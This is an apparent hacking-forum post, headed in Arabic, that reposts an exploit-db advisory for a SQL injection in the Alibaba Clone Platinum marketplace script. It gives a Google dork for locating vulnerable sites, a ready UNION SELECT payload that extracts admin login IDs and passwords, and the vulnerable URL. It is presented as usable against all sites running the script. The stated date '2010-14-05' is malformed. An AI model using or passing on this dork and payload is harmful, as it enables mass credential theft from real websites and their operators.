ثغرة sql من صنعي كل مواقع السكربت ثغرة sql من صنعي كل مواقع السكربت http://www.exploit-db.com/exploits/12609 كود PHP: # Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability # EDB-ID: 12468 # CVE-ID: () # OSVDB-ID: () # Author: GuN # Published: 2010-14-05 # Verified: yes
........../¯¯/).................(\¯¯\.......... ........./¯.//....................\\.¯\......... ......../..//.........GuN........\\..\........ ../´¯`/' /´`\...WJA-TEAM../´`\ '\`´¯\... ./ '/ / / /¨/¯\................./¯\¨\ \ \ \' \. ( '( ´ ´ ¯\/'' )................( ''/\¯ ` ` )' )
----------------------------------------------------------------------- Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : GuN ------------------ Location : Tunisia - Tunis - Lycée él Omrane [2 Sc 3] /<!Tabka mohamed!>/ ------------------ Time Zone : GMT +1:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Alibaba Clone Platinum Vendor : http://www.alibabaclone.com/ Price : $699 USD Google Dork : allinurl:buyer/index.php?ProductID= Overview :B2B trading Marketplace Script clone of alibaba Marketplace script is a wonderful solution to launch your own business to business and b2c site. Script is packed with lot of features to provide a very sound foundation to your trading portal site.
Exploit: ~~~~~~~ -22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--
SQLi GuN: ~~~~~~~ http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID=
GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis <3 Inter <==> Volc4n0 <==> Vbspiders.com
Contact: XGuN@Hacker.Ps ~~~~ XGuN@ViP.Cn ~~~~
|